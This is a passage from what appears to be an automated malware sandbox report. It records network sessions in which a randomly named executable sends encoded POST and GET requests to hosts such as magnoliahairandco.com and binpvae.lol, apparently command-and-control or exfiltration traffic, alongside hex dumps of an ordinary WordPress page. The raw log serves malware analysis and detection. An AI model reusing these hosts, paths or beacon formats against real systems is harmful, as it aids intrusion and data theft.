                                      Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/*! This file is auto-generated */!function(i,n){var o,
                                      Jun 10, 2024 10:21:12.155251026 CEST1236INData Raw: 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62
                                      Data Ascii: n f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});r
                                      Jun 10, 2024 10:21:12.155286074 CEST1236INData Raw: 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                      Data Ascii: ){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingE
                                      Jun 10, 2024 10:21:12.155320883 CEST1236INData Raw: 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f
                                      Data Ascii: css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-
                                      Jun 10, 2024 10:21:12.155354023 CEST1236INData Raw: 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d
                                      Data Ascii: adient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-
                                      Jun 10, 2024 10:21:12.155390978 CEST1236INData Raw: 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d
                                      Data Ascii: radient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset
                                      Jun 10, 2024 10:21:12.155422926 CEST1236INData Raw: 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e
                                      Data Ascii: t-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has
                                      Jun 10, 2024 10:21:12.155457973 CEST1236INData Raw: 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                      Data Ascii: or: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !importa
                                      Jun 10, 2024 10:21:12.155508995 CEST1236INData Raw: 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b
                                      Data Ascii: -border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink)
                                      Jun 10, 2024 10:21:12.160566092 CEST1236INData Raw: 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e
                                      Data Ascii: cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradien


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.55137134.149.87.45802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:17.524070024 CEST741OUTPOST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 75 59 63 59 70 39 31 76 47 6b 67 63 79 35 52 51 76 4f 61 79 33 49 52 62 7a 4b 77 4d 75 52 78 63 65 66 77 72 31 55 59 33 55 45 36 49 6a 4e 6b 79 51 45 43 33 6f 34 42 54 54 63 58 45 68 71 63 76 5a 6e 73 76 6c 70 6e 62 74 2f 7a 6e 69 37 53 63 62 46 5a 79 59 6b 46 59 72 6a 6a 6f 65 6d 62 65 6e 37 7a 69 4e 75 6f 56 36 55 34 65 33 49 47 4d 72 45 32 79 38 53 58 6c 39 64 6b 4f 4c 35 77 59 65 4f 4e 7a 69 54 47 52 6c 56 6d 41 30 65 4a 75 54 4c 74 69 2f 4b 69 45 4e 70 2f 34 34 69 6e 6d 56 77 61 73 4d 37 52 6f 72 75 6a 42 7a 56 4f 6b 2b 6c 48 73 64 43 54 72 36 2b 73 3d
                                      Data Ascii: TTv82Lg=y+I+zarb1XLEuYcYp91vGkgcy5RQvOay3IRbzKwMuRxcefwr1UY3UE6IjNkyQEC3o4BTTcXEhqcvZnsvlpnbt/zni7ScbFZyYkFYrjjoemben7ziNuoV6U4e3IGMrE2y8SXl9dkOL5wYeONziTGRlVmA0eJuTLti/KiENp/44inmVwasM7RorujBzVOk+lHsdCTr6+s=
                                      Jun 10, 2024 10:21:18.343774080 CEST674INHTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007678.23121635146216586
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:18 GMT
                                      X-Served-By: cache-dfw-kdfw8210035-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.55137234.149.87.45802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:20.059545040 CEST761OUTPOST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 56 63 65 39 34 72 79 67 73 33 54 45 36 49 6f 74 6b 33 4e 30 43 34 6f 34 64 74 54 5a 2f 45 68 71 59 76 5a 69 49 76 6c 34 6e 55 73 76 7a 70 2b 37 53 53 44 6c 5a 79 59 6b 46 59 72 6e 4c 53 65 6d 44 65 6b 4c 44 69 66 64 77 57 79 30 34 5a 6e 34 47 4d 35 30 32 49 38 53 57 32 39 63 4a 6c 4c 36 45 59 65 4b 42 7a 68 43 47 53 72 6c 6d 61 77 65 49 43 57 37 6f 4f 32 36 75 45 53 50 2b 58 75 51 53 5a 64 6d 33 47 57 5a 5a 41 34 4f 50 35 6a 47 47 54 76 56 6d 46 48 68 44 62 6b 70 35 46 47 77 6f 38 65 59 43 73 56 79 76 54 4b 67 37 37 6b 74 45 48
                                      Data Ascii: TTv82Lg=y+I+zarb1XLEv7EYreNvAEgf8ZRQhua23IdbzLE6viVce94rygs3TE6Iotk3N0C4o4dtTZ/EhqYvZiIvl4nUsvzp+7SSDlZyYkFYrnLSemDekLDifdwWy04Zn4GM502I8SW29cJlL6EYeKBzhCGSrlmaweICW7oO26uESP+XuQSZdm3GWZZA4OP5jGGTvVmFHhDbkp5FGwo8eYCsVyvTKg77ktEH
                                      Jun 10, 2024 10:21:20.863603115 CEST674INHTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007680.75121635234316589
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:20 GMT
                                      X-Served-By: cache-dfw-kdfw8210133-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.55137334.149.87.45802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:22.602669001 CEST1778OUTPOST /fkxp/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.magnoliahairandco.com
                                      Referer: http://www.magnoliahairandco.com/fkxp/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 79 2b 49 2b 7a 61 72 62 31 58 4c 45 76 37 45 59 72 65 4e 76 41 45 67 66 38 5a 52 51 68 75 61 32 33 49 64 62 7a 4c 45 36 76 69 64 63 65 49 73 72 31 78 73 33 53 45 36 49 32 64 6b 32 4e 30 43 6c 6f 34 46 70 54 5a 36 2f 68 6f 51 76 59 45 45 76 79 38 37 55 6c 76 7a 70 6d 37 53 54 62 46 5a 6e 59 6b 31 63 72 6a 76 53 65 6d 44 65 6b 4a 72 69 50 65 6f 57 30 30 34 65 33 49 47 51 72 45 33 47 38 53 2f 44 39 63 4e 54 4b 4d 30 59 64 75 74 7a 75 51 75 53 74 31 6d 63 33 65 49 61 57 36 55 52 32 36 79 79 53 50 69 75 75 54 43 5a 4d 53 36 61 45 36 73 63 67 73 6a 67 75 52 2b 6a 30 6c 6d 5a 47 77 33 36 68 2b 51 6a 4e 79 70 65 52 76 32 49 55 79 69 30 4f 6d 66 38 75 6f 70 4f 43 68 50 52 74 57 55 48 30 38 56 47 56 65 47 5a 65 2b 70 6a 33 58 30 62 63 64 32 36 35 54 73 64 70 41 70 36 4b 33 42 6a 77 36 78 6c 4c 65 61 34 71 32 41 70 6f 4f 6d 6f 42 46 37 59 71 43 2b 57 47 51 4f 64 75 56 73 68 62 78 45 6d 6d 76 54 77 65 52 52 38 34 73 61 5a 73 65 71 56 67 46 76 78 53 74 48 52 71 43 32 37 2f 74 2f 4d 39 52 [TRUNCATED]
                                      Data Ascii: TTv82Lg=y+I+zarb1XLEv7EYreNvAEgf8ZRQhua23IdbzLE6vidceIsr1xs3SE6I2dk2N0Clo4FpTZ6/hoQvYEEvy87Ulvzpm7STbFZnYk1crjvSemDekJriPeoW004e3IGQrE3G8S/D9cNTKM0YdutzuQuSt1mc3eIaW6UR26yySPiuuTCZMS6aE6scgsjguR+j0lmZGw36h+QjNypeRv2IUyi0Omf8uopOChPRtWUH08VGVeGZe+pj3X0bcd265TsdpAp6K3Bjw6xlLea4q2ApoOmoBF7YqC+WGQOduVshbxEmmvTweRR84saZseqVgFvxStHRqC27/t/M9RCVYCwJJbX7sc7a3F9pk81FWevBwjrOvHlVe0N1uBr1YB478js/xZoZLR7GeI8p6YufoEWGBuRdjH49ooUaTEb2VaWVeqLBa/BJx5SrLa6VsiK/borwjPdnMfPvuLVDbjO9XJFxFlM04IXrpx7HGdE6MWX6+Ww6etrF2xpgimv79cOsOTZ/WFGCjGOLPQyvdx1PdTqGT3szPHpnGM8T0ReCQIFBi/VugTWBgcJW6G0MnLKDOlkqGMx7xxMwWM+OYrrk+jNKUQIe8zud55q4NcZ3I42OiFvv94bDoE4HuXtwXZyrZUtKg1Ps7/4919/097QK4vPnRSFIRx4bccjqCXExjr7HIfAH8d+fcZ502GZys4rwuqkW5iy+Ww/n/OMPwpkLRpGmAGxNQW3goiJYrsv3OAG+Znb1OiWOWr9pUf5ELsRbRGw87IUOPniLjnaQ8058q5p65reLQK1oUK72I5mcJPoaXQXBYjO4PDuZHaSlKQ4tTEajbT2JxGLqPfmYC6xQKtxIf/o0+M4gQZRsCEAMb01RylL230rXSJrWYfAR1+3aL6ZxvT/JjH1cLumwvTL9auTyWCo8WSU6vSWa6yv8gcRJILB64eS+lkM1haKQPzoaEYuHuGFbnZgHAKMjFwyYxrvVlq6Q0x0oU6a4vLPU2iN48PWzZWmh [TRUNCATED]
                                      Jun 10, 2024 10:21:23.303809881 CEST675INHTTP/1.1 403 Forbidden
                                      Content-Length: 146
                                      Content-Type: text/html
                                      Server: Pepyaka
                                      X-Wix-Request-Id: 1718007683.192217429985716572
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:23 GMT
                                      X-Served-By: cache-dfw-kdfw8210062-DFW
                                      X-Cache: MISS
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yx
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.55137434.149.87.45802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:25.134241104 CEST464OUTGET /fkxp/?kH=00U8ENLHk&TTv82Lg=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.magnoliahairandco.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:25.881891012 CEST1172INHTTP/1.1 301 Moved Permanently
                                      Content-Length: 0
                                      Location: https://www.magnoliahairandco.com/fkxp?kH=00U8ENLHk&TTv82Lg=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4%2Fyxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ%3D%3D
                                      Strict-Transport-Security: max-age=86400
                                      X-Wix-Request-Id: 1718007685.7292175723712814102
                                      Age: 0
                                      Cache-Control: no-cache
                                      Server: Pepyaka
                                      X-Content-Type-Options: nosniff
                                      Accept-Ranges: bytes
                                      Date: Mon, 10 Jun 2024 08:21:25 GMT
                                      X-Served-By: cache-dfw-kdfw8210139-DFW
                                      X-Cache: MISS
                                      Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_uw2-pub-1_g
                                      X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRaljDG+XJYhrKse2gSLD9NqjXMk6vD/xY5wyq4cHt9fyljQtgW7xI86jgF1d+kiHWtEA==,2UNV7KOq4oGjA5+PKsX47MQSdi0AYTjuWOc8y48MAyZjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+EuO/EOFuU1yLyA423o/TtI=,GiE5c8Q213kn1NHwElo57O/WhgyJqwy8xztguXADRhESO5XmrrCSQNDehIjmfew32uZFBWWpaf/44hppUySdwQ==
                                      Via: 1.1 google
                                      glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.551375116.213.43.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:31.255763054 CEST711OUTPOST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 73 75 39 6a 4c 46 39 58 57 4b 38 7a 67 45 75 48 43 6d 49 4c 44 52 6d 2f 74 57 59 4c 7a 4d 35 42 63 58 71 5a 57 63 50 55 2f 50 30 50 64 59 62 32 36 30 46 71 69 2b 79 74 4f 79 6e 64 61 4b 56 6b 2b 67 6a 48 73 47 4b 68 4d 38 48 59 76 49 73 7a 2b 73 33 4a 77 77 6f 4a 6a 7a 5a 42 67 68 63 7a 4c 74 4f 78 6b 51 63 35 5a 62 45 48 59 42 49 78 74 2f 6c 68 78 73 45 43 6c 53 31 32 7a 66 66 33 32 4c 4d 6b 66 33 2b 37 4c 32 6a 45 33 46 41 70 2b 37 5a 59 7a 41 53 77 44 51 48 36 5a 66 6b 35 61 53 33 6c 7a 76 66 6a 4d 4f 67 69 4f 33 6c 44 54 30 65 33 38 51 54 35 30 37 45 3d
                                      Data Ascii: TTv82Lg=uk1x/TEAJt0tsu9jLF9XWK8zgEuHCmILDRm/tWYLzM5BcXqZWcPU/P0PdYb260Fqi+ytOyndaKVk+gjHsGKhM8HYvIsz+s3JwwoJjzZBghczLtOxkQc5ZbEHYBIxt/lhxsEClS12zff32LMkf3+7L2jE3FAp+7ZYzASwDQH6Zfk5aS3lzvfjMOgiO3lDT0e38QT507E=
                                      Jun 10, 2024 10:21:32.212155104 CEST146INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:32 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.551376116.213.43.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:21:33.789751053 CEST731OUTPOST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 75 6b 31 78 2f 54 45 41 4a 74 30 74 74 4f 4e 6a 4a 6d 6c 58 54 71 38 79 6c 45 75 48 4c 47 49 50 44 57 75 2f 74 54 67 62 7a 2b 64 42 63 79 4f 5a 58 64 50 55 79 76 30 50 4a 49 61 79 6c 6b 46 39 69 2b 2b 4c 4f 77 44 64 61 4b 42 6b 2b 6c 48 48 76 78 57 69 4d 73 48 57 6b 6f 73 74 7a 4d 33 4a 77 77 6f 4a 6a 7a 4e 37 67 6e 30 7a 4c 64 2b 78 6c 78 63 36 46 4c 46 31 62 42 49 78 67 66 6c 6c 78 73 45 72 6c 57 31 59 7a 63 6e 33 32 4b 38 6b 63 69 53 30 43 32 6a 65 70 31 42 6a 79 49 6b 54 79 44 4f 38 45 78 4f 43 4e 50 70 41 53 45 61 50 70 4e 58 4c 66 75 4d 61 65 6b 74 30 43 45 2f 65 6d 7a 44 4a 71 73 53 6f 75 63 36 75 35 39 30 77 78 55 49 52 6c 71 46 69 43 42 58 67
                                      Data Ascii: TTv82Lg=uk1x/TEAJt0ttONjJmlXTq8ylEuHLGIPDWu/tTgbz+dBcyOZXdPUyv0PJIaylkF9i++LOwDdaKBk+lHHvxWiMsHWkostzM3JwwoJjzN7gn0zLd+xlxc6FLF1bBIxgfllxsErlW1Yzcn32K8kciS0C2jep1BjyIkTyDO8ExOCNPpASEaPpNXLfuMaekt0CE/emzDJqsSouc6u590wxUIRlqFiCBXg
                                      Jun 10, 2024 10:21:34.845151901 CEST146INHTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:34 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.551377116.213.43.190802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
